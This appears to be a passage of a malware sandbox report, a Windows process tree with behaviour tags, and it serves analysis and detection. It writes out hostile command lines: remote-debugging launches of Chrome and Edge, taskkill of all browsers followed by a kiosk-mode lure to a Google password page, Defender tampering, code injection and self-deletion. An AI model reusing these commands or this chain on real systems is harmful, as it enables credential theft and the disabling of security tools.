C:\Users\Admin\AppData\Local\Temp\10235940101\2c7732faec.exe"C:\Users\Admin\AppData\Local\Temp\10235940101\2c7732faec.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:1996 -
C:\Users\Admin\AppData\Local\Temp\J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe"C:\Users\Admin\AppData\Local\Temp\J9HXZRTQVUGD1VAMIAXZT7VXANA87T.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4416
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235950101\a459430e67.exe"C:\Users\Admin\AppData\Local\Temp\10235950101\a459430e67.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
PID:2220 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:4980 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffa270edcf8,0x7ffa270edd04,0x7ffa270edd108⤵PID:5812
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2112,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2108 /prefetch:28⤵PID:2144
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1604,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2204 /prefetch:38⤵PID:4504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2408,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2264 /prefetch:88⤵PID:2884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3140,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3172 /prefetch:18⤵
- Uses browser remote debugging
PID:5976
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3208 /prefetch:18⤵
- Uses browser remote debugging
PID:456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4468 /prefetch:18⤵
- Uses browser remote debugging
PID:4868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4968,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4980 /prefetch:88⤵PID:924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4964,i,4084476444099289694,17282040769894054078,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5292 /prefetch:88⤵PID:3896
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""7⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:9080 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x30c,0x7ffa1b48f208,0x7ffa1b48f214,0x7ffa1b48f2208⤵PID:9848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=2432 /prefetch:38⤵PID:8860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2180,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=2464 /prefetch:88⤵PID:8624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2364,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=2360 /prefetch:28⤵PID:9100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3444,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:18⤵
- Uses browser remote debugging
PID:10128
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:18⤵
- Uses browser remote debugging
PID:1812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4988,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=5136 /prefetch:88⤵PID:2024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4996,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=5164 /prefetch:88⤵PID:3960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6032,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=6056 /prefetch:88⤵PID:2504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6032,i,5380574745593279663,2474273946335827002,262144 --variations-seed-version --mojo-platform-channel-handle=6056 /prefetch:88⤵PID:5704
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235960101\741ee2da36.exe"C:\Users\Admin\AppData\Local\Temp\10235960101\741ee2da36.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5172 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:9936
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4452
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3484
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵PID:1960
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2664 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1984 -prefsLen 27100 -prefMapHandle 1988 -prefMapSize 270279 -ipcHandle 2064 -initialChannelId {043d1317-2f62-4d4a-8454-51ad9ecd8871} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵PID:6368
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2468 -prefsLen 27136 -prefMapHandle 2472 -prefMapSize 270279 -ipcHandle 2480 -initialChannelId {6a26b7fa-31d0-4986-bf92-117018a54e6a} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵PID:6436
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3940 -prefsLen 25213 -prefMapHandle 3944 -prefMapSize 270279 -jsInitHandle 3948 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3956 -initialChannelId {9f5b45ef-1e31-40cc-9b63-28969d800b33} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
PID:6684
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4132 -prefsLen 27326 -prefMapHandle 4136 -prefMapSize 270279 -ipcHandle 4204 -initialChannelId {44f0ecbd-e40b-4f50-8375-cd865788728f} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵PID:6720
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2740 -prefsLen 34825 -prefMapHandle 2884 -prefMapSize 270279 -jsInitHandle 2820 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3020 -initialChannelId {453ced15-d420-4220-9f4d-0d76f548620c} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
PID:6964
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 3272 -prefsLen 34960 -prefMapHandle 3276 -prefMapSize 270279 -ipcHandle 5268 -initialChannelId {8f4e2954-7736-49d0-b962-66d84e57ac23} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
PID:8320
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5800 -prefsLen 32952 -prefMapHandle 4936 -prefMapSize 270279 -jsInitHandle 5768 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5776 -initialChannelId {c3c2916c-4e1e-4637-9580-ca5a88e5d072} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
PID:8700
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5948 -prefsLen 32952 -prefMapHandle 5952 -prefMapSize 270279 -jsInitHandle 5956 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5968 -initialChannelId {decfef59-a5a6-4f4d-949d-301bb975b7ee} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
PID:9260
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5980 -prefsLen 32952 -prefMapHandle 5984 -prefMapSize 270279 -jsInitHandle 5988 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5996 -initialChannelId {5f9d38f1-4d49-4b21-90e1-0853863cf4be} -parentPid 2664 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2664" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
PID:8336
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10235970101\08fc08f920.exe"C:\Users\Admin\AppData\Local\Temp\10235970101\08fc08f920.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:8216
-
-
C:\Users\Admin\AppData\Local\Temp\10235980101\9926fc9698.exe"C:\Users\Admin\AppData\Local\Temp\10235980101\9926fc9698.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10952
-
-
C:\Users\Admin\AppData\Local\Temp\10235990101\8f24a78ca9.exe"C:\Users\Admin\AppData\Local\Temp\10235990101\8f24a78ca9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"7⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:7836
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe"C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:6640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\10236000101\m0wsoI3.exe" & exit7⤵
- System Location Discovery: System Language Discovery
PID:3180 -
C:\Windows\SysWOW64\timeout.exetimeout /t 58⤵
- Delays execution with timeout.exe
PID:10876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236010101\UD49QH6.exe"C:\Users\Admin\AppData\Local\Temp\10236010101\UD49QH6.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7932
-
-
C:\Users\Admin\AppData\Local\Temp\10236020101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10236020101\HmngBpR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:472 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:15244 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:14692 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:8072
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236030101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10236030101\zY9sqWs.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:9480 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:448
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236040101\f52454a24e.exe"C:\Users\Admin\AppData\Local\Temp\10236040101\f52454a24e.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:8892 -
C:\Users\Admin\AppData\Local\Temp\10236040101\f52454a24e.exe"C:\Users\Admin\AppData\Local\Temp\10236040101\f52454a24e.exe"7⤵PID:19672
-
-
-
C:\Users\Admin\AppData\Local\Temp\10236050101\f3e1addcc3.exe"C:\Users\Admin\AppData\Local\Temp\10236050101\f3e1addcc3.exe"6⤵
- Loads dropped DLL
PID:24664
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1524
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"1⤵
- Executes dropped EXE
PID:4060
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3320 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ffa3665dcf8,0x7ffa3665dd04,0x7ffa3665dd102⤵PID:1504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2060,i,9514269458267934424,10186474582850653712,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2052 /prefetch:22⤵PID:5940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2304,i,9514269458267934424,10186474582850653712,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2340 /prefetch:32⤵PID:5652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2428,i,9514269458267934424,10186474582850653712,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2584 /prefetch:82⤵PID:5256
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,9514269458267934424,10186474582850653712,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3292 /prefetch:12⤵PID:4212
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3240,i,9514269458267934424,10186474582850653712,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3248 /prefetch:12⤵PID:5328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4432,i,9514269458267934424,10186474582850653712,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4496 /prefetch:22⤵PID:5428
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4724,i,9514269458267934424,10186474582850653712,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4716 /prefetch:12⤵PID:2456
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3988
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /71⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1028
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1016
-
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"1⤵
- Executes dropped EXE
PID:3432
-
